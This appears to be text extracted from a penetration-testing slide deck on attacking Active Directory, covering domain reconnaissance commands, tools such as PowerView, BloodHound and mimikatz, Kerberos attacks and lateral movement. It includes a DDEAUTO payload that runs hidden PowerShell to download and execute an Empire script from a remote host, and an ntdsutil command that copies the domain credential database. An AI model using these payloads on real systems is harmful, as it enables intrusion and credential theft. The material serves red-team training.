Beruflich Dokumente
Kultur Dokumente
ACTIVE DIRECTORY
Carlos García García
ciyinet
WHOAMI Carlos García García
- Computer Science Engineer
- Penetration Testing and Red Teaming
- OSCP Certified
- Co-author book “Hacking Windows:
Ataques a sistemas y redes Microsoft”
WE GOING -
-
Active Directory Penetration Testing
Reconnaissance
TO TALK - Common Attacks & Techniques
ABOUT? - Lateral and Vertical Movements
- How-to Avoid Being Caught
• Domain admins
• Enterprise admins
• Built-in administrators
• Account Operators
• Allowed RODC Password
Replication Group
• Backup Operators
• DnsAdmins
• …
WMIC
Reference:
Microsoft Advanced Threat Analytics
DDEAUTO
"C:\\Programs\\Microsoft\\Office365\\Outlook\\..\\..\\..\\..\\windows\\system
32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden
$e=(New-Object
System.Net.WebClient).DownloadString('http://172.16.201.201:8000/empire-
test.ps1');powershell -e $e # " "Beneficios Qurtuba"
Command Description
ping ☺
echo %USERDOMAIN% Domain name which the host is joined to
echo %logonserver% Obtains the name of the Domain Controller the host used to
set logonserver authenticate to
Command Description
net user /domain Lists all users within the domaindominio actual
net user <ACCOUNT NAME> /domain Obtains detailed information about a user given his username
net view Displays a list of domains, computers, or resources that are being
shared by the specified computer. Used without parameters, net
view displays a list of computers in your current domain
net use Access to shared resources
net accounts /domain Obtains the domain password policy
nltest /domain_trusts Maps trust relationships
Reference:
https://adsecurity.org/?p=2362
Reference:
https://adsecurity.org/?p=2362
4. DC sends a TGS
ticket encrypted using
the hash of the
account that is
associated with that
service (SPN)
References:
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
https://github.com/magnumripper/JohnTheRipper
PowerView Find-ShareDomain
• Searches for computer shares on the domain. If -CheckShareAccess is passed, then only
shares the current user has read access to are returned.
smbmap
• Intended to simplify searching for potentially sensitive data across large networks.
• Enumerates samba share drives across an entire domain. List drives, permissions, contents,
upload/download functionality, file name auto-download pattern matching, etc.
Reference:
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
https://github.com/ShawnDEvans/smbmap
References:
https://github.com/gentilkiwi/mimikatz
• BloodHound
References:
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
https://github.com/BloodHoundAD/BloodHound
Kerberos Kerberos
References:
http://blog.gentilkiwi.com/securite/mimikatz/overpass-the-hash
Attacker
krbtgt:hash
TGT:
• Username
• Groups
membership
• …
Reference:
https://blog.alsid.eu/dcshadow-explained-4510f52fc19d
Schtasks
schtasks /create /tn TASK_NAME /tr EXECUTABLE /sc once /st 00:00 /S
TARGET_HOST /RU System
schtasks /run /tn TASK_NAME /S TARGET_HOST
SC
sc \\TARGET_HOST create SERVICE_NAME binpath= “EXECUTABLE”
WinRM
PsExec
Ntdsutil
ntdsutil "ac i ntds" "ifm" "create full c:\copy-ntds" quit quit
Invoke-NinjaCopy
User SID
Group SIDs
Logon SID
Others …
• Run as
• NTLM Relay
• Pass-the-hash Logon session
• Pass-the-ticket
• Golden ticket
carlos@ciyi.es
ciyinet
ciyinet@protonmail.com